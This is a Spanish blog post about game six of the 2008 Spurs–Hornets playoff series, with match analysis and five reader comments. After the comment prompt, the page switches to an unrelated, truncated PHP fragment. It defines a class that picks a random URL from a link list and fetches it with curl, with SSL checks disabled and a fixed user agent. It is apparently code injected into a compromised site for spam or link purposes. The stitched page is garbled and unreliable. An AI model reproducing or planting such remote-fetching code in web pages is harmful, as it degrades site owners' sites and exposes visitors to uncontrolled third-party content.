El momento de los campeones (NOH 80 – SAS 99)

16 de May de 2008 por TheDeerHunter

Los Spurs no están muertos. Nadie ha llegado a pensar que lo estén a pesar de las palizas que se han llevado en Nueva Orleans. Con un 2-0 en contra, y después con un 3-2, es cierto que han podido surgir dudas de si volvería la maldición del año par en esta serie pero lo cierto es que después de todo el camino andado, se llega al partido definitivo con el equipo aspirante muy magullado y ellos más frescos que una lechuga.

Tenían la eliminación a un paso y salieron a machacar a sus rivales desde el principio. Con un Duncan extramotivado y un Ginobili acertado arrasaron con un parcial de 36 a 24 en el primer cuarto. Después tan sólo tenían que centrarse en controlar determinados elementos de los visitantes para mantener la ventaja como ellos, más que nadie, saben hacerlo. Con su juego interior sufriendo problemas físicos, los Hornets bastante hicieron con aguantar el chaparrón hasta el final de la primera parte. Chris Paul mantenía como podía el barco a flote, pero el resto no era capaz de achicar en absoluto. Finalmente West tuvo que retirarse lesionado y aquello terminó siendo una matanza en toda regla durante el tercer cuarto, cuando sólo pudieron anotar 11 míseros puntos. Aquí el partido terminó, si no lo había hecho ya antes.

Ahora el séptimo vuelve a Nueva Orleans, donde el equipo local se ha mostrado absolutamente intratable. Lo hace, sin embargo, en el peor momento para ellos y con los Spurs creciditos moralmente tras el partido de anoche. Esta será la prueba definitiva para los Hornets, acerca de su teórica falta de experiencia y todo lo demás. En parte ya habían desmontado esa opinión, pero no habían llegado a vivir una situación límite como la que hay ahora contra los peores cocos posibles. Ellos han sido globalmente mejores que San Antonio, pero si no logran culminar todo lo anterior no habrá servido para nada.

Comenta

5 comentarios a esta entrada

  1. xapa_croack dice:
    #1

    Mucho tendra k mejorar duncan para poder ganar el partido, a pesar de sus buenos numeros no se le ve fino y muchas veces “sin ideas”.

    Veremos si puede jugar west o no, pero en caso negativo, horry habra sido el encargado de cargarselo como el año pasado contra nash.

      Citar

  2. Gallis dice:
    #2

    Oye, sospechamos de Horry o se lo perdamos por ser él???

    Y la serie, para mi, se juega en el tercer cuarto del séptimo. Si sigue la “racha”, pasarán los Hornets. Si en el último cuarto hay partido, apuesto por los Spurs.

      Citar

  3. xapa_croack dice:
    #3

    Ayer comentaban en la retransmision que horry dijo k popovic es mejor entrenador que el tio jackson, pq el primero si tenia que chillar a cualquier jugador lo hacia mientras que el segundo a las estrellas nunca les chillaba.

    PD: a el le chillaria phill???

      Citar

  4. TheDeerHunter dice:
    #4

    Para despertarle en algún partido de temporada regular

      Citar

  5. planetbasket.net dice:
    #5

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>